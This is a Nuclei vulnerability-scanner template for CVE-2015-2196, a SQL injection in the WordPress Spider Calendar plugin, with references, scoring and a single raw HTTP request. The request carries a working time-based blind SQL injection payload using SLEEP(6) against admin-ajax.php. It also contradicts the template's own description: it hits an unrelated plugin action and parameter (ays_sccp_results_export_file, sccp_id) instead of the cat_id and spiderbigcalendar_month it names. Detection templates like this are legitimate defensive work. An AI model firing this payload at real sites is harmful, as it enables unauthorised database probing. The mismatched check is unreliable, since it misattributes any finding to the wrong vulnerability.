id: CVE-2015-2196 info: name: WordPress Spider Calendar <=1.4.9 - SQL Injection author: theamanrawat severity: high description: | WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. remediation: Fixed in version 1.4.14. reference: - https://wpscan.com/vulnerability/8d436356-37f8-455e-99b3-effe8d0e3cad - https://wordpress.org/plugins/spider-event-calendar/ - http://www.exploit-db.com/exploits/36061 - https://nvd.nist.gov/vuln/detail/CVE-2015-2196 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2015-2196 cwe-id: CWE-89 epss-score: 0.0093 epss-percentile: 0.81236 cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: web-dorado product: spider_calendar framework: wordpress tags: wordpress,wp,sqli,cve2015,wpscan,wp-plugin,spider-event-calendar,unauth,edb,cve http: - raw: - | @timeout 10s GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'duration_1>=6' - 'status_code == 200' - 'contains(body, "{\"status\":true,\"data\"")' condition: and